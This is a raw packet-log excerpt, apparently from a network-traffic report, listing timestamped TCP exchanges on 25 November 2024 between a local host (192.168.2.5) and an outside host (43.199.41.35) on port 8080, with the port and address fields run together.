                                                                                                                                                        Nov 25, 2024 11:10:21.645370007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.645423889 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.646291018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.646409035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.646456957 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.647069931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.647130966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.647176981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.647943020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.648066044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.648121119 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.648768902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.648894072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.648947001 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.649729013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.649786949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.649837017 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.650599957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.650743961 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.650795937 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.651473999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.651525974 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.651571989 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.652406931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.652494907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.652534962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.653229952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.653455019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.653501987 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.654109001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.654186964 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.654232979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.655004025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.655102015 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.655153036 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.655875921 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.698348045 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.759031057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.759182930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.759227037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.759435892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.759526968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.759639978 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.760373116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.760438919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.760497093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.761312962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.761323929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.761385918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.762177944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.762217999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.762259007 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.763010979 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.763199091 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.763237953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.763927937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.763940096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.763973951 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.789566994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.789670944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.789721012 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.789940119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.790060997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.790102959 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.791048050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.791363955 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.791387081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.791404963 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.792052031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.792092085 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.792155981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.792937994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.792978048 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.793066978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.793834925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.793874025 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.793937922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.794723034 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.794759035 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.794886112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.795609951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.795649052 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.795706987 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.796498060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.796535015 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.796588898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.797388077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.797430038 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.797456026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.816471100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.816509962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.816550016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.816890955 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.816930056 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.817042112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.817786932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.817826033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.817832947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.818665981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.818703890 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.818747997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.819567919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.819605112 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.819695950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.820550919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.820593119 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.820605993 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.821338892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.821378946 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.821409941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.822220087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.822258949 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.822310925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.823085070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.823122978 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.823167086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.823977947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.824018002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.824088097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.824857950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.824893951 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.824954033 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.825722933 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.825762033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.825865030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.826632977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.826831102 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.826855898 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.827666044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.827706099 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.827709913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.828429937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.828469992 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.828526020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.829304934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.829341888 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.829399109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.830214977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.830260992 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.830265999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.831088066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.831130028 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.831187010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.831928968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.831970930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.832029104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.832830906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.832869053 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.832969904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.833731890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.833771944 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.833801031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.834734917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.834752083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.834775925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.835649967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.835689068 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.835689068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.836429119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.836466074 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.836476088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.837261915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.837300062 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.837346077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.838176012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.838187933 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.838212013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.839067936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.839107990 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.839116096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.840145111 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.840186119 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.840224981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.840786934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.840826035 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.840931892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.841844082 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.841881990 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.841938972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.842581987 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.842619896 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.842659950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.843473911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.843528986 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.843585014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.844347954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.844392061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.844544888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.845288992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.845312119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.845329046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.846255064 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.846271992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.846297026 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.847080946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.847121954 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.847122908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.848038912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.848086119 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.951257944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.951292992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.951342106 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.951646090 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.951747894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.951793909 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.952547073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.952640057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.952683926 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.953413010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.953569889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.953613043 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.954320908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.954426050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.954467058 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.955215931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.955342054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.955384970 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.956063032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.956163883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.956207037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.983814001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.983973026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.984014988 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.984231949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.984303951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.984349966 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.985110044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.985307932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.985351086 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.985953093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.986067057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.986108065 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.986866951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.986959934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.987000942 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.987750053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.987961054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.988055944 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.988605976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.988720894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.988775969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.989468098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.989615917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.989655018 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.990391016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.990505934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.990595102 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.991276979 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.991358995 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.991404057 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.008666992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.008692980 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.008738041 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.008960009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.009115934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.009165049 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.009892941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.009988070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.010030031 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.010790110 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.010874033 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.010925055 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.011625051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.011761904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.011812925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.012506008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.012618065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.012662888 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.013397932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.013499022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.013539076 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.014324903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.014404058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.014445066 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.015185118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.015306950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.015347958 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.016108036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.016169071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.016206026 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.016936064 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.017047882 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.017086983 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.017910957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.017987013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.018045902 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.018728971 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.018906116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.018944979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.019630909 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.019737005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.019772053 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.020492077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.020632982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.020673037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.021493912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.021549940 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.021590948 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.022267103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.022320986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.022376060 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.023264885 CET80804970543.199.41.35192.168.2.5
